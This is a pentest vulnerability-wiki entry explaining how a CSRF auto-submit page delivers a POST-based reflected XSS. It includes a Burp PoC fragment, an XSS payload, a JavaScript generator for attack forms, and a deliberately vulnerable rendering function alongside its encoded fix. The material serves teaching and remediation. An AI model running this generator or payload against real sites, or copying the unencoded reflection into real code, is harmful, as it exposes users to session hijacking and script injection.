Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

CSRF/URL-Based XSS

POC

Send the following CSRF PoC to exploit the XSS. The PoC is an attacker-hosted HTML page that auto-submits a form carrying the XSS payload to the vulnerable endpoint, so a POST-only reflection can still be triggered from a victim's browser; document.forms[0] refers to that form, whose target URL and hidden parameters are specific to the finding and are not reproduced here.

  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
  <script>document.forms[0].submit();</script>

The first script rewrites the visible URL so the victim sees the site root rather than the attacker page; the second must appear after the form in the page, otherwise document.forms[0] is undefined when it runs.
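The following is an added worked example, not code from the Cobalt wiki and not a Burp artefact. It generalises the PoC above: a generator that builds a Burp-style auto-submitting form for any target and parameter set, and the vulnerable versus hardened server-side reflection that decides whether the delivered payload executes. The target URL https://target.example/search, the parameter name q and the payload are assumptions chosen for illustration.

```javascript
// Added example (not Cobalt's wiki code or a Burp artefact): how a CSRF-style
// auto-submitting form delivers a POST-based reflected XSS payload, and the
// server-side output encoding that neutralises it. The target URL, parameter
// name and payload below are assumptions chosen for illustration.

// HTML-escape a string for use in text content and quoted attribute values.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Build an attacker page with the same structure as a Burp "CSRF PoC":
// pushState hides the attacker URL in the address bar, the form POSTs the
// payload, and the trailing script submits it. Values are attribute-encoded
// so the payload reaches the server byte-for-byte (the browser decodes the
// entities before sending the form body). The submit script is emitted after
// the form; before it, document.forms[0] would be undefined.
function buildCsrfPoc(action, params) {
  const inputs = Object.entries(params)
    .map(([name, value]) =>
      `      <input type="hidden" name="${htmlEncode(name)}" value="${htmlEncode(value)}" />`)
    .join('\n');
  return [
    '<html>',
    '  <body>',
    "  <script>history.pushState('', '', '/')</script>",
    `    <form action="${htmlEncode(action)}" method="POST">`,
    inputs,
    '      <input type="submit" value="Submit request" />',
    '    </form>',
    '  <script>document.forms[0].submit();</script>',
    '  </body>',
    '</html>',
  ].join('\n');
}

// Vulnerable server-side rendering: reflects the POSTed parameter verbatim.
function renderVulnerable(q) {
  return `<p>Results for ${q}</p>`;
}

// Hardened rendering: output-encode at the HTML text sink.
function renderHardened(q) {
  return `<p>Results for ${htmlEncode(q)}</p>`;
}

// Crude check used only for this demo: does a <script> tag survive into the page?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Simulate the browser decoding the hidden input's value attribute on submit.
function decodeAttr(s) {
  return s.replace(/&#39;/g, "'").replace(/&quot;/g, '"').replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>').replace(/&amp;/g, '&');
}

// Constructed input (assumption): the target echoes the POST parameter "q".
const PAYLOAD = '<script>alert(document.domain)</script>';
const POC = buildCsrfPoc('https://target.example/search', { q: PAYLOAD });

// Walk the payload through delivery and both sinks.
function demo() {
  const submitted = decodeAttr(POC.match(/value="([^"]*)"/)[1]); // first hidden input
  return {
    payloadSurvivesDelivery: submitted === PAYLOAD,
    vulnerableExecutes: containsScriptTag(renderVulnerable(submitted)),
    hardenedExecutes: containsScriptTag(renderHardened(submitted)),
  };
}

if (typeof module !== 'undefined' && require.main === module) {
  console.log(POC);
  console.log(demo());
}
```

Two things follow from running it. First, attribute-encoding the hidden input values is what keeps the PoC itself well-formed when the payload contains quotes or angle brackets; the browser undoes that encoding before the POST, so the server still receives the raw payload. Second, the fix for the XSS is output encoding at the reflecting sink; a CSRF token on the endpoint would block this particular delivery route but leaves the reflection itself in place.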

Impact

Low-Medium

Likelihood

Low-Medium